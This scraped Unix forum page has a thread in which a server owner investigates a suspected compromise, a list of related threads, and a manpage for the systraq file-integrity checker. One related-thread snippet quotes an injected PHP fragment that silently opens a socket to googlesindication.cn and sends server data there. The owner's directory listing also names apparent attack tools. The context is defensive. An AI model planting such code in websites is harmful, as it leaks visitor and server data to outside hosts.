Malicious perl script Post: 302992363

Sponsored Content

Operating Systems Linux Debian Malicious perl script Post 302992363 by dadprpus on Friday 24th of February 2017 07:31:02 AM

02-24-2017

Registered User

Quote:

Originally Posted by drysdalk

Can I just check - it looks from what you've said that you're trying to type 1s (that's a number one followed by a lower-case letter 'S') rather than ls (that's a lower-case letter 'L' followed by a lower-case letter 'S', which is the correct command).

If that's what you've been doing, could you try again with the correct command name and see what happens please ?

If you have been typing it correctly then your system must be quite badly damaged or missing some very fundamental binaries, since the ls command is pretty much as common as it gets on any UNIX-style system.

You are right. I was doing it wrong. It did look like a 1 to me...so this is what I got:

Code:

[root@dedicated ~]# ls -l /proc/4600
ls: cannot access /proc/4600: No such file or directory
[root@dedicated ~]# ls -l/proc/4600/fd
ls: invalid option -- '/'
Try `ls --help' for more information.
[root@dedicated ~]# ls -l /proc/4600/fd
ls: cannot access /proc/4600/fd: No such file or directory
[root@dedicated ~]# ls -a
.                  echo                                      .odbc.ini
..                 findbot.pl                                parallels
1                  ghosttest                                 .pki
anaconda-ks.cfg    ghosttest.c                               plk
.autoinstaller     id_rsa.pub                                psasem.sem
.bash_history      install_keys.sh                           .rnd
.bash_logout       install.log                               run.pl
.bash_profile      install.log.syslog                        .spamassassin
.bashrc            .lesshst                                  .ssh
bash-shellshocker  mysql-community-release-el6-5.noarch.rpm  strace.log
.cshrc             .mysql_history                            .tcshrc

Tech support got back to me last night said it was a brute force attack (?) and that my install of "ban to fail" stopped it. But to me it looks as if it was run from "inside my computer". It slowed the server down to a crawl. also legitimate emails have stopped being able to send to comcast, Verizon, yahoo,etc. Have contacted them but they say we are not on their black list. Just can't figure this out. I have a minimal tech support package so they say "You have this....and you need to do this....good luck....Oh and by the way you can upgrade for $$$".

Last edited by dadprpus; 02-24-2017 at 08:39 AM..

dadprpus

View Public Profile for dadprpus

Find all posts by dadprpus

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ...

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated...

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -...

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl...

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"...

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not...

LEARN ABOUT DEBIAN

st_snapshot

ST_SNAPSHOT(1)							      systraq							    ST_SNAPSHOT(1)

NAME

       st_snapshot - calculate checksum and stat ownership and permissions of files

SYNOPSIS

       ST_SUM=sha256sum st_snapshot patterns homepatterns

DESCRIPTION

       st_snapshot calculates checksums and stats ownership and permissions of critical system files.

       This script is typically run in either root-mode or public-mode.  Running this script in root-mode requires root priviliges.  One is
       adviced to set up a dedicated user account for running this script in public mode.

       In root-mode, the files snapshot_root.list and snapshot_root.homelist are typically passed as arguments.  These pattern files are read by
       the script and contain names of files and directories; listing a directory in such a pattern file is equivalent to listing all files which
       live in the directorytree with this directory as root.

       snapshot_root.list could e.g. read

	# snapshot_root.list - files and directories we wanna get
	# monitored: we wanna get a note once these files, or any file
	# under these directories, gets created, gets rm-ed, gets
	# permissions or contents changed.  these notices will not
	# include the possibly secret contents of these files
	#
	# this file gets read by st_systraq
	/etc/group
	/etc/gshadow
	/etc/hosts.allow
	/etc/hosts.deny
	/etc/hosts.equiv
	/etc/lilo.conf
	/etc/passwd
	/etc/postfix/server.pem
	/etc/shadow
	/etc/skel
	/etc/ssh

       Equivalent files snapshot_pub.list and snapshot_pub.homelist should be on the system.  These files should contain all worldreadable to be
       monitored files.  This allows for running this script as root only in those cases where it's needed: when reading files, readable for root
       only.

       The homelist files contain files and directories which should get monitored for every homedirectory on the system.  snapshot_pub.homelist
       could e.g. contain:

	.profile
	.cshrc
	.tcshrc
	.login
	.logout
	.bash_profile
	.bashrc
	.exrc
	.nexrc

       As a special case, when the environment variable ST_OPHOMES is set to a non-empty string (typically when running in public mode), we stat
       the permissions on all homedirectories themselves.

       The produced snapshot is printed to stdout.  The output when running in public mode could look like:

	# ownership and permissions of homedirs
	drwxr-xr-x root root /bin
	drwxr-xr-x root root /dev
	drwxr-sr-x root staff /home
	drwxr-sr-x joostvb joostvb /home/joostvb
	drwxr-xr-x root root /usr/sbin
	drwxr-xr-x root root /var
	# sha256sum of critical pub files
	4d3cd13d6dbc10e2e3ccb9477cbc9eb9b76302454c276d5771ae0b10a5fbb4d2  /home/joostvb/.ssh/id_rsa.pub
	eb8d83e0246f761a21bdfb13a03fac634ed7c3b7dde4c2efddd7b2838d32596f  /var/qmail/alias/.bashrc
	4e371f9a11f5a2464d3d5c952e58e24f73b377d33767ed93b2082fcb59a647fe  /etc/zlogin
	# ownership and permissions of critical pub files
	-rw-rw-r-- joostvb joostvb /home/joostvb/.ssh/id_rsa.pub
	-rw-r--r-- joostvb joostvb /home/joostvb/.ssh/authorized_keys

ENVIRONMENT

       ST_OPHOMES - non-empty in case permissions on all homedirectories should be printed

       ST_SUM - command for calculating file checksums.  E.g. sha256sum, sha512sum, sha384sum, sha224sum or sha1sum.

SEE ALSO

       The systraq manual.

VERSION

       This manpage: $Id: st_snapshot.pod 374 2008-12-14 08:47:32Z joostvb $

COPYRIGHT

       Copyright (C) 2001, 2002, 2003, 2004, 2008 Joost van Baal

       This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
       the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

       This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

       You should have received a copy of the GNU General Public License along with this program (see COPYING); if not, check with
       http://www.gnu.org/copyleft/gpl.html or write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111, USA.

AUTHOR

       Joost van Baal <joostvb-systraq-20041015@mdcc.cx>

20081217							    2008-12-15							    ST_SNAPSHOT(1)